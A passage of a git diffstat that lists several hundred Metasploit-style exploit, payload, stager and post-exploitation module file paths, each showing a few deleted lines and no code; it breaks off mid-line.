modules/exploits/windows/http/edirectory_imonitor.rb | 4 ---- modules/exploits/windows/http/efs_easychatserver_username.rb | 4 ---- modules/exploits/windows/http/fdm_auth_header.rb | 4 ---- modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb | 4 ---- modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb | 4 ---- modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb | 4 ---- .../exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb | 4 ---- .../exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb | 4 ---- modules/exploits/windows/http/hp_nnm_openview5.rb | 4 ---- modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb | 4 ---- modules/exploits/windows/http/hp_nnm_ovas.rb | 4 ---- modules/exploits/windows/http/hp_nnm_ovwebhelp.rb | 4 ---- modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb | 4 ---- modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb | 4 ---- modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb | 4 ---- modules/exploits/windows/http/hp_nnm_snmp.rb | 4 ---- modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb | 4 ---- modules/exploits/windows/http/hp_nnm_toolbar_01.rb | 4 ---- modules/exploits/windows/http/hp_nnm_toolbar_02.rb | 4 ---- modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb | 4 ---- .../exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb | 4 ---- modules/exploits/windows/http/hp_openview_insight_backdoor.rb | 4 ---- modules/exploits/windows/http/hp_power_manager_filename.rb | 4 ---- modules/exploits/windows/http/hp_power_manager_login.rb | 4 ---- modules/exploits/windows/http/httpdx_handlepeer.rb | 4 ---- modules/exploits/windows/http/httpdx_tolog_format.rb | 4 ---- modules/exploits/windows/http/ia_webmail.rb | 4 ---- modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb | 4 ---- modules/exploits/windows/http/ibm_tpmfosd_overflow.rb | 4 ---- modules/exploits/windows/http/ibm_tsm_cad_header.rb | 4 ---- modules/exploits/windows/http/icecast_header.rb | 4 ---- modules/exploits/windows/http/integard_password_bof.rb | 4 ---- modules/exploits/windows/http/intersystems_cache.rb | 4 ---- modules/exploits/windows/http/ipswitch_wug_maincfgret.rb | 4 ---- modules/exploits/windows/http/kolibri_http.rb | 4 ---- modules/exploits/windows/http/mailenable_auth_header.rb | 4 ---- modules/exploits/windows/http/manageengine_apps_mngr.rb | 4 ---- modules/exploits/windows/http/maxdb_webdbm_database.rb | 4 ---- modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb | 4 ---- modules/exploits/windows/http/mcafee_epolicy_source.rb | 4 ---- modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb | 4 ---- modules/exploits/windows/http/minishare_get_overflow.rb | 4 ---- modules/exploits/windows/http/navicopa_get_overflow.rb | 4 ---- modules/exploits/windows/http/novell_imanager_upload.rb | 4 ---- modules/exploits/windows/http/novell_messenger_acceptlang.rb | 4 ---- modules/exploits/windows/http/nowsms.rb | 4 ---- modules/exploits/windows/http/oracle9i_xdb_pass.rb | 4 ---- modules/exploits/windows/http/osb_uname_jlist.rb | 4 ---- modules/exploits/windows/http/peercast_url.rb | 4 ---- modules/exploits/windows/http/privatewire_gateway.rb | 4 ---- modules/exploits/windows/http/psoproxy91_overflow.rb | 4 ---- modules/exploits/windows/http/sambar6_search_results.rb | 4 ---- modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb | 4 ---- modules/exploits/windows/http/sapdb_webtools.rb | 4 ---- modules/exploits/windows/http/savant_31_overflow.rb | 4 ---- modules/exploits/windows/http/servu_session_cookie.rb | 4 ---- modules/exploits/windows/http/shoutcast_format.rb | 4 ---- modules/exploits/windows/http/shttpd_post.rb | 4 ---- modules/exploits/windows/http/steamcast_useragent.rb | 4 ---- modules/exploits/windows/http/sybase_easerver.rb | 4 ---- modules/exploits/windows/http/trackercam_phparg_overflow.rb | 4 ---- modules/exploits/windows/http/trendmicro_officescan.rb | 4 ---- modules/exploits/windows/http/webster_http.rb | 4 ---- modules/exploits/windows/http/xampp_webdav_upload_php.rb | 4 ---- modules/exploits/windows/http/xitami_if_mod_since.rb | 4 ---- modules/exploits/windows/http/zenworks_uploadservlet.rb | 4 ---- modules/exploits/windows/iis/iis_webdav_upload_asp.rb | 4 ---- modules/exploits/windows/iis/ms01_023_printer.rb | 4 ---- modules/exploits/windows/iis/ms01_026_dbldecode.rb | 4 ---- modules/exploits/windows/iis/ms01_033_idq.rb | 4 ---- modules/exploits/windows/iis/ms02_018_htr.rb | 4 ---- modules/exploits/windows/iis/ms02_065_msadc.rb | 4 ---- modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb | 4 ---- modules/exploits/windows/imap/eudora_list.rb | 4 ---- modules/exploits/windows/imap/imail_delete.rb | 4 ---- modules/exploits/windows/imap/ipswitch_search.rb | 4 ---- modules/exploits/windows/imap/mailenable_login.rb | 4 ---- modules/exploits/windows/imap/mailenable_status.rb | 4 ---- modules/exploits/windows/imap/mailenable_w3c_select.rb | 4 ---- modules/exploits/windows/imap/mdaemon_cram_md5.rb | 4 ---- modules/exploits/windows/imap/mdaemon_fetch.rb | 4 ---- modules/exploits/windows/imap/mercur_imap_select_overflow.rb | 4 ---- modules/exploits/windows/imap/mercur_login.rb | 4 ---- modules/exploits/windows/imap/mercury_login.rb | 4 ---- modules/exploits/windows/imap/mercury_rename.rb | 4 ---- modules/exploits/windows/imap/novell_netmail_append.rb | 4 ---- modules/exploits/windows/imap/novell_netmail_auth.rb | 4 ---- modules/exploits/windows/imap/novell_netmail_status.rb | 4 ---- modules/exploits/windows/imap/novell_netmail_subscribe.rb | 4 ---- modules/exploits/windows/isapi/ms00_094_pbserver.rb | 4 ---- modules/exploits/windows/isapi/ms03_022_nsiislog_post.rb | 4 ---- modules/exploits/windows/isapi/ms03_051_fp30reg_chunked.rb | 4 ---- modules/exploits/windows/isapi/rsa_webagent_redirect.rb | 4 ---- modules/exploits/windows/isapi/w3who_query.rb | 4 ---- modules/exploits/windows/ldap/imail_thc.rb | 4 ---- modules/exploits/windows/ldap/pgp_keyserver7.rb | 4 ---- modules/exploits/windows/license/calicclnt_getconfig.rb | 4 ---- modules/exploits/windows/license/calicserv_getconfig.rb | 4 ---- modules/exploits/windows/license/sentinel_lm7_udp.rb | 4 ---- modules/exploits/windows/local/ask.rb | 4 ---- modules/exploits/windows/local/bypassuac.rb | 4 ---- modules/exploits/windows/local/current_user_psexec.rb | 4 ---- modules/exploits/windows/lotus/domino_http_accept_language.rb | 4 ---- modules/exploits/windows/lotus/domino_icalendar_organizer.rb | 4 ---- modules/exploits/windows/lotus/domino_sametime_stmux.rb | 4 ---- modules/exploits/windows/lotus/lotusnotes_lzh.rb | 4 ---- modules/exploits/windows/lpd/hummingbird_exceed.rb | 4 ---- modules/exploits/windows/lpd/niprint.rb | 4 ---- modules/exploits/windows/lpd/saplpd.rb | 4 ---- modules/exploits/windows/lpd/wincomlpd_admin.rb | 4 ---- modules/exploits/windows/misc/agentxpp_receive_agentx.rb | 4 ---- .../exploits/windows/misc/apple_quicktime_rtsp_response.rb | 4 ---- modules/exploits/windows/misc/asus_dpcproxy_overflow.rb | 4 ---- modules/exploits/windows/misc/bakbone_netvault_heap.rb | 4 ---- modules/exploits/windows/misc/bcaaa_bof.rb | 4 ---- modules/exploits/windows/misc/bigant_server.rb | 4 ---- modules/exploits/windows/misc/bigant_server_250.rb | 4 ---- modules/exploits/windows/misc/bigant_server_usv.rb | 4 ---- modules/exploits/windows/misc/bomberclone_overflow.rb | 4 ---- modules/exploits/windows/misc/bopup_comm.rb | 4 ---- modules/exploits/windows/misc/borland_interbase.rb | 4 ---- modules/exploits/windows/misc/borland_starteam.rb | 4 ---- modules/exploits/windows/misc/citrix_streamprocess.rb | 4 ---- modules/exploits/windows/misc/doubletake.rb | 4 ---- modules/exploits/windows/misc/eiqnetworks_esa.rb | 4 ---- modules/exploits/windows/misc/eiqnetworks_esa_topology.rb | 4 ---- modules/exploits/windows/misc/eureka_mail_err.rb | 4 ---- modules/exploits/windows/misc/fb_isc_attach_database.rb | 4 ---- modules/exploits/windows/misc/fb_isc_create_database.rb | 4 ---- modules/exploits/windows/misc/fb_svc_attach.rb | 4 ---- modules/exploits/windows/misc/hp_omniinet_1.rb | 4 ---- modules/exploits/windows/misc/hp_omniinet_2.rb | 4 ---- modules/exploits/windows/misc/hp_omniinet_3.rb | 4 ---- modules/exploits/windows/misc/hp_omniinet_4.rb | 4 ---- modules/exploits/windows/misc/hp_ovtrace.rb | 4 ---- modules/exploits/windows/misc/ib_isc_attach_database.rb | 4 ---- modules/exploits/windows/misc/ib_isc_create_database.rb | 4 ---- modules/exploits/windows/misc/ib_svc_attach.rb | 4 ---- modules/exploits/windows/misc/ibm_tsm_cad_ping.rb | 4 ---- modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb | 4 ---- modules/exploits/windows/misc/landesk_aolnsrvr.rb | 4 ---- modules/exploits/windows/misc/mercury_phonebook.rb | 4 ---- modules/exploits/windows/misc/mini_stream.rb | 4 ---- modules/exploits/windows/misc/mirc_privmsg_server.rb | 4 ---- modules/exploits/windows/misc/ms07_064_sami.rb | 4 ---- modules/exploits/windows/misc/netcat110_nt.rb | 4 ---- modules/exploits/windows/misc/nettransport.rb | 4 ---- modules/exploits/windows/misc/poppeeper_date.rb | 4 ---- modules/exploits/windows/misc/poppeeper_uidl.rb | 4 ---- modules/exploits/windows/misc/pxexploit.rb | 4 ---- modules/exploits/windows/misc/realtek_playlist.rb | 4 ---- modules/exploits/windows/misc/sap_2005_license.rb | 4 ---- modules/exploits/windows/misc/shixxnote_font.rb | 4 ---- modules/exploits/windows/misc/splayer_content_type.rb | 4 ---- modules/exploits/windows/misc/talkative_response.rb | 4 ---- modules/exploits/windows/misc/tiny_identd_overflow.rb | 4 ---- modules/exploits/windows/misc/ufo_ai.rb | 4 ---- modules/exploits/windows/misc/windows_rsh.rb | 4 ---- modules/exploits/windows/misc/wireshark_packet_dect.rb | 4 ---- modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb | 4 ---- modules/exploits/windows/motorola/timbuktu_fileupload.rb | 4 ---- modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb | 4 ---- modules/exploits/windows/mssql/ms02_039_slammer.rb | 4 ---- modules/exploits/windows/mssql/ms02_056_hello.rb | 4 ---- .../exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb | 4 ---- .../windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb | 4 ---- modules/exploits/windows/mssql/mssql_payload.rb | 4 ---- modules/exploits/windows/mssql/mssql_payload_sqli.rb | 4 ---- modules/exploits/windows/mysql/mysql_payload.rb | 4 ---- modules/exploits/windows/mysql/mysql_yassl_hello.rb | 4 ---- modules/exploits/windows/nfs/xlink_nfsd.rb | 4 ---- modules/exploits/windows/nntp/ms05_030_nntp.rb | 4 ---- modules/exploits/windows/novell/groupwisemessenger_client.rb | 4 ---- modules/exploits/windows/novell/nmap_stor.rb | 4 ---- modules/exploits/windows/novell/zenworks_desktop_agent.rb | 4 ---- modules/exploits/windows/oracle/osb_ndmp_auth.rb | 4 ---- modules/exploits/windows/oracle/tns_arguments.rb | 4 ---- modules/exploits/windows/oracle/tns_auth_sesskey.rb | 4 ---- modules/exploits/windows/oracle/tns_service_name.rb | 4 ---- modules/exploits/windows/pop3/seattlelab_pass.rb | 4 ---- modules/exploits/windows/proxy/bluecoat_winproxy_host.rb | 4 ---- modules/exploits/windows/proxy/ccproxy_telnet_ping.rb | 4 ---- modules/exploits/windows/proxy/proxypro_http_get.rb | 4 ---- modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb | 4 ---- modules/exploits/windows/scada/citect_scada_odbc.rb | 4 ---- modules/exploits/windows/scada/daq_factory_bof.rb | 4 ---- modules/exploits/windows/scada/factorylink_csservice.rb | 4 ---- modules/exploits/windows/scada/factorylink_vrn_09.rb | 4 ---- modules/exploits/windows/scada/iconics_genbroker.rb | 4 ---- .../exploits/windows/scada/iconics_webhmi_setactivexguid.rb | 4 ---- .../exploits/windows/scada/igss9_igssdataserver_listall.rb | 4 ---- modules/exploits/windows/scada/igss9_igssdataserver_rename.rb | 4 ---- modules/exploits/windows/scada/igss9_misc.rb | 4 ---- modules/exploits/windows/scada/moxa_mdmtool.rb | 4 ---- modules/exploits/windows/scada/procyon_core_server.rb | 4 ---- modules/exploits/windows/scada/realwin.rb | 4 ---- modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb | 4 ---- modules/exploits/windows/scada/realwin_on_fcs_login.rb | 4 ---- modules/exploits/windows/scada/realwin_scpc_initialize.rb | 4 ---- modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb | 4 ---- modules/exploits/windows/scada/realwin_scpc_txtevent.rb | 4 ---- modules/exploits/windows/scada/scadapro_cmdexe.rb | 4 ---- modules/exploits/windows/scada/winlog_runtime.rb | 4 ---- modules/exploits/windows/sip/aim_triton_cseq.rb | 4 ---- modules/exploits/windows/sip/sipxezphone_cseq.rb | 4 ---- modules/exploits/windows/sip/sipxphone_cseq.rb | 4 ---- modules/exploits/windows/smb/ms03_049_netapi.rb | 4 ---- modules/exploits/windows/smb/ms04_007_killbill.rb | 4 ---- modules/exploits/windows/smb/ms04_011_lsass.rb | 4 ---- modules/exploits/windows/smb/ms04_031_netdde.rb | 4 ---- modules/exploits/windows/smb/ms05_039_pnp.rb | 4 ---- modules/exploits/windows/smb/ms06_025_rasmans_reg.rb | 4 ---- modules/exploits/windows/smb/ms06_025_rras.rb | 4 ---- modules/exploits/windows/smb/ms06_040_netapi.rb | 4 ---- modules/exploits/windows/smb/ms06_066_nwapi.rb | 4 ---- modules/exploits/windows/smb/ms06_066_nwwks.rb | 4 ---- modules/exploits/windows/smb/ms06_070_wkssvc.rb | 4 ---- modules/exploits/windows/smb/ms07_029_msdns_zonename.rb | 4 ---- modules/exploits/windows/smb/ms08_067_netapi.rb | 4 ---- .../windows/smb/ms09_050_smb2_negotiate_func_index.rb | 4 ---- modules/exploits/windows/smb/ms10_061_spoolss.rb | 4 ---- modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb | 4 ---- modules/exploits/windows/smb/psexec.rb | 4 ---- modules/exploits/windows/smb/smb_relay.rb | 4 ---- modules/exploits/windows/smb/timbuktu_plughntcommand_bof.rb | 4 ---- modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb | 4 ---- modules/exploits/windows/smtp/mercury_cram_md5.rb | 4 ---- .../exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb | 4 ---- modules/exploits/windows/smtp/njstar_smtp_bof.rb | 4 ---- modules/exploits/windows/smtp/wmailserver.rb | 4 ---- modules/exploits/windows/smtp/ypops_overflow1.rb | 4 ---- modules/exploits/windows/ssh/freeftpd_key_exchange.rb | 4 ---- modules/exploits/windows/ssh/freesshd_key_exchange.rb | 4 ---- modules/exploits/windows/ssh/putty_msg_debug.rb | 4 ---- modules/exploits/windows/ssh/securecrt_ssh1.rb | 4 ---- modules/exploits/windows/ssl/ms04_011_pct.rb | 4 ---- modules/exploits/windows/telnet/gamsoft_telsrv_username.rb | 4 ---- modules/exploits/windows/telnet/goodtech_telnet.rb | 4 ---- modules/exploits/windows/tftp/attftp_long_filename.rb | 4 ---- modules/exploits/windows/tftp/dlink_long_filename.rb | 4 ---- modules/exploits/windows/tftp/futuresoft_transfermode.rb | 4 ---- modules/exploits/windows/tftp/quick_tftp_pro_mode.rb | 4 ---- modules/exploits/windows/tftp/tftpd32_long_filename.rb | 4 ---- modules/exploits/windows/tftp/tftpdwin_long_filename.rb | 4 ---- modules/exploits/windows/tftp/threectftpsvc_long_mode.rb | 4 ---- modules/exploits/windows/unicenter/cam_log_security.rb | 4 ---- modules/exploits/windows/vnc/realvnc_client.rb | 4 ---- modules/exploits/windows/vnc/ultravnc_client.rb | 4 ---- modules/exploits/windows/vnc/ultravnc_viewer_bof.rb | 4 ---- modules/exploits/windows/vnc/winvnc_http_get.rb | 4 ---- modules/exploits/windows/vpn/safenet_ike_11.rb | 4 ---- modules/exploits/windows/winrm/winrm_script_exec.rb | 4 ---- modules/exploits/windows/wins/ms04_045_wins.rb | 4 ---- modules/nops/armle/simple.rb | 4 ---- modules/nops/nop_test.rb.ut.rb | 4 ---- modules/nops/php/generic.rb | 4 ---- modules/nops/ppc/simple.rb | 4 ---- modules/nops/sparc/random.rb | 4 ---- modules/nops/tty/generic.rb | 4 ---- modules/nops/x64/simple.rb | 4 ---- modules/nops/x86/opty2.rb | 4 ---- modules/nops/x86/single_byte.rb | 4 ---- modules/payloads/singles/aix/ppc/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/aix/ppc/shell_find_port.rb | 4 ---- modules/payloads/singles/aix/ppc/shell_interact.rb | 4 ---- modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/bsd/x86/exec.rb | 4 ---- modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb | 4 ---- modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb | 4 ---- modules/payloads/singles/bsd/x86/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb | 4 ---- modules/payloads/singles/bsd/x86/shell_find_port.rb | 4 ---- modules/payloads/singles/bsd/x86/shell_find_tag.rb | 4 ---- modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb | 4 ---- modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/bsdi/x86/shell_find_port.rb | 4 ---- modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/cmd/unix/bind_inetd.rb | 4 ---- modules/payloads/singles/cmd/unix/bind_netcat.rb | 4 ---- modules/payloads/singles/cmd/unix/bind_netcat_ipv6.rb | 4 ---- modules/payloads/singles/cmd/unix/bind_perl.rb | 4 ---- modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb | 4 ---- modules/payloads/singles/cmd/unix/bind_ruby.rb | 4 ---- modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb | 4 ---- modules/payloads/singles/cmd/unix/generic.rb | 4 ---- modules/payloads/singles/cmd/unix/interact.rb | 4 ---- modules/payloads/singles/cmd/unix/reverse.rb | 4 ---- modules/payloads/singles/cmd/unix/reverse_bash.rb | 4 ---- modules/payloads/singles/cmd/unix/reverse_netcat.rb | 4 ---- modules/payloads/singles/cmd/unix/reverse_perl.rb | 4 ---- modules/payloads/singles/cmd/unix/reverse_ruby.rb | 4 ---- modules/payloads/singles/cmd/windows/adduser.rb | 2 -- modules/payloads/singles/cmd/windows/bind_perl.rb | 4 ---- modules/payloads/singles/cmd/windows/bind_perl_ipv6.rb | 4 ---- modules/payloads/singles/cmd/windows/bind_ruby.rb | 4 ---- modules/payloads/singles/cmd/windows/download_eval_vbs.rb | 2 -- modules/payloads/singles/cmd/windows/download_exec_vbs.rb | 2 -- modules/payloads/singles/cmd/windows/reverse_perl.rb | 4 ---- modules/payloads/singles/cmd/windows/reverse_ruby.rb | 4 ---- modules/payloads/singles/generic/custom.rb | 4 ---- modules/payloads/singles/generic/debug_trap.rb | 4 ---- modules/payloads/singles/generic/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/generic/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/generic/tight_loop.rb | 4 ---- modules/payloads/singles/java/jsp_shell_bind_tcp.rb | 4 ---- modules/payloads/singles/java/jsp_shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/java/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/linux/armle/adduser.rb | 4 ---- modules/payloads/singles/linux/armle/exec.rb | 4 ---- modules/payloads/singles/linux/armle/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/linux/mipsbe/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/linux/mipsle/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/linux/ppc/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/linux/ppc/shell_find_port.rb | 4 ---- modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/linux/ppc64/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/linux/ppc64/shell_find_port.rb | 4 ---- modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/linux/x64/exec.rb | 4 ---- modules/payloads/singles/linux/x64/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/linux/x64/shell_find_port.rb | 4 ---- modules/payloads/singles/linux/x64/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/linux/x86/adduser.rb | 4 ---- modules/payloads/singles/linux/x86/chmod.rb | 4 ---- modules/payloads/singles/linux/x86/exec.rb | 4 ---- modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb | 4 ---- modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb | 4 ---- modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb | 4 ---- modules/payloads/singles/linux/x86/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/linux/x86/shell_find_port.rb | 4 ---- modules/payloads/singles/linux/x86/shell_find_tag.rb | 4 ---- modules/payloads/singles/linux/x86/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/linux/x86/shell_reverse_tcp2.rb | 3 --- modules/payloads/singles/osx/armle/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/osx/armle/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/osx/armle/vibrate.rb | 4 ---- modules/payloads/singles/osx/ppc/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/osx/x64/exec.rb | 4 ---- modules/payloads/singles/osx/x86/exec.rb | 4 ---- modules/payloads/singles/osx/x86/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/osx/x86/shell_find_port.rb | 4 ---- modules/payloads/singles/osx/x86/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb | 4 ---- modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb | 4 ---- modules/payloads/singles/php/bind_perl.rb | 4 ---- modules/payloads/singles/php/bind_perl_ipv6.rb | 4 ---- modules/payloads/singles/php/bind_php.rb | 4 ---- modules/payloads/singles/php/bind_php_ipv6.rb | 4 ---- modules/payloads/singles/php/download_exec.rb | 4 ---- modules/payloads/singles/php/exec.rb | 4 ---- modules/payloads/singles/php/meterpreter_reverse_tcp.rb | 4 ---- modules/payloads/singles/php/reverse_perl.rb | 4 ---- modules/payloads/singles/php/reverse_php.rb | 4 ---- modules/payloads/singles/php/shell_findsock.rb | 4 ---- modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/solaris/sparc/shell_find_port.rb | 4 ---- modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/solaris/x86/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/solaris/x86/shell_find_port.rb | 4 ---- modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/tty/unix/interact.rb | 4 ---- modules/payloads/singles/windows/adduser.rb | 4 ---- modules/payloads/singles/windows/download_exec.rb | 4 ---- modules/payloads/singles/windows/exec.rb | 4 ---- modules/payloads/singles/windows/loadlibrary.rb | 4 ---- modules/payloads/singles/windows/messagebox.rb | 4 ---- modules/payloads/singles/windows/metsvc_bind_tcp.rb | 4 ---- modules/payloads/singles/windows/metsvc_reverse_tcp.rb | 4 ---- modules/payloads/singles/windows/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/windows/shell_bind_tcp_xpfw.rb | 4 ---- modules/payloads/singles/windows/shell_reverse_tcp.rb | 4 ---- modules/payloads/singles/windows/speak_pwned.rb | 4 ---- modules/payloads/singles/windows/x64/exec.rb | 4 ---- modules/payloads/singles/windows/x64/loadlibrary.rb | 4 ---- modules/payloads/singles/windows/x64/shell_bind_tcp.rb | 4 ---- modules/payloads/singles/windows/x64/shell_reverse_tcp.rb | 4 ---- modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb | 4 ---- modules/payloads/stagers/bsd/x86/bind_tcp.rb | 4 ---- modules/payloads/stagers/bsd/x86/find_tag.rb | 4 ---- modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb | 4 ---- modules/payloads/stagers/bsd/x86/reverse_tcp.rb | 4 ---- modules/payloads/stagers/bsdi/x86/bind_tcp.rb | 4 ---- modules/payloads/stagers/bsdi/x86/reverse_tcp.rb | 4 ---- modules/payloads/stagers/java/bind_tcp.rb | 4 ---- modules/payloads/stagers/java/reverse_http.rb | 4 ---- modules/payloads/stagers/java/reverse_https.rb | 4 ---- modules/payloads/stagers/java/reverse_tcp.rb | 4 ---- modules/payloads/stagers/linux/x64/bind_tcp.rb | 4 ---- modules/payloads/stagers/linux/x64/reverse_tcp.rb | 4 ---- modules/payloads/stagers/linux/x86/bind_ipv6_tcp.rb | 4 ---- modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb | 4 ---- modules/payloads/stagers/linux/x86/bind_tcp.rb | 4 ---- modules/payloads/stagers/linux/x86/find_tag.rb | 4 ---- modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb | 4 ---- modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb | 4 ---- modules/payloads/stagers/linux/x86/reverse_tcp.rb | 4 ---- modules/payloads/stagers/netware/reverse_tcp.rb | 4 ---- modules/payloads/stagers/osx/armle/bind_tcp.rb | 4 ---- modules/payloads/stagers/osx/armle/reverse_tcp.rb | 4 ---- modules/payloads/stagers/osx/ppc/bind_tcp.rb | 4 ---- modules/payloads/stagers/osx/ppc/find_tag.rb | 4 ---- modules/payloads/stagers/osx/ppc/reverse_tcp.rb | 4 ---- modules/payloads/stagers/osx/x86/bind_tcp.rb | 4 ---- modules/payloads/stagers/osx/x86/reverse_tcp.rb | 4 ---- modules/payloads/stagers/php/bind_tcp.rb | 4 ---- modules/payloads/stagers/php/bind_tcp_ipv6.rb | 4 ---- modules/payloads/stagers/php/reverse_tcp.rb | 4 ---- modules/payloads/stagers/windows/bind_ipv6_tcp.rb | 4 ---- modules/payloads/stagers/windows/bind_nonx_tcp.rb | 4 ---- modules/payloads/stagers/windows/bind_tcp.rb | 4 ---- modules/payloads/stagers/windows/findtag_ord.rb | 4 ---- modules/payloads/stagers/windows/reverse_http.rb | 4 ---- modules/payloads/stagers/windows/reverse_https.rb | 4 ---- modules/payloads/stagers/windows/reverse_ipv6_http.rb | 4 ---- modules/payloads/stagers/windows/reverse_ipv6_https.rb | 4 ---- modules/payloads/stagers/windows/reverse_ipv6_tcp.rb | 4 ---- modules/payloads/stagers/windows/reverse_nonx_tcp.rb | 4 ---- modules/payloads/stagers/windows/reverse_ord_tcp.rb | 4 ---- modules/payloads/stagers/windows/reverse_tcp.rb | 4 ---- modules/payloads/stagers/windows/reverse_tcp_allports.rb | 4 ---- modules/payloads/stagers/windows/reverse_tcp_dns.rb | 4 ---- modules/payloads/stagers/windows/x64/bind_tcp.rb | 4 ---- modules/payloads/stagers/windows/x64/reverse_tcp.rb | 4 ---- modules/payloads/stages/bsd/x86/shell.rb | 4 ---- modules/payloads/stages/bsdi/x86/shell.rb | 4 ---- modules/payloads/stages/java/meterpreter.rb | 4 ---- modules/payloads/stages/java/shell.rb | 4 ---- modules/payloads/stages/linux/x64/shell.rb | 4 ---- modules/payloads/stages/linux/x86/meterpreter.rb | 4 ---- modules/payloads/stages/linux/x86/shell.rb | 4 ---- modules/payloads/stages/netware/shell.rb | 4 ---- modules/payloads/stages/osx/armle/execute.rb | 4 ---- modules/payloads/stages/osx/armle/shell.rb | 4 ---- modules/payloads/stages/osx/ppc/shell.rb | 4 ---- modules/payloads/stages/osx/x86/bundleinject.rb | 4 ---- modules/payloads/stages/osx/x86/isight.rb | 4 ---- modules/payloads/stages/osx/x86/vforkshell.rb | 4 ---- modules/payloads/stages/php/meterpreter.rb | 4 ---- modules/payloads/stages/windows/dllinject.rb | 4 ---- modules/payloads/stages/windows/meterpreter.rb | 4 ---- modules/payloads/stages/windows/patchupdllinject.rb | 4 ---- modules/payloads/stages/windows/patchupmeterpreter.rb | 4 ---- modules/payloads/stages/windows/shell.rb | 4 ---- modules/payloads/stages/windows/upexec.rb | 4 ---- modules/payloads/stages/windows/vncinject.rb | 4 ---- modules/payloads/stages/windows/x64/meterpreter.rb | 4 ---- modules/payloads/stages/windows/x64/shell.rb | 4 ---- modules/payloads/stages/windows/x64/vncinject.rb | 4 ---- modules/post/aix/hashdump.rb | 3 --- modules/post/cisco/gather/enum_cisco.rb | 4 ---- modules/post/linux/gather/checkvm.rb | 3 --- modules/post/linux/gather/hashdump.rb | 3 --- modules/post/multi/gather/apple_ios_backup.rb | 4 ---- modules/post/multi/gather/dns_bruteforce.rb | 4 ---- modules/post/multi/gather/dns_reverse_lookup.rb | 4 ---- modules/post/multi/gather/dns_srv_lookup.rb | 4 ---- modules/post/multi/gather/enum_vbox.rb | 4 ---- modules/post/multi/gather/env.rb | 4 ---- modules/post/multi/gather/filezilla_client_cred.rb | 4 ---- modules/post/multi/gather/find_vmx.rb | 4 ---- modules/post/multi/gather/firefox_creds.rb | 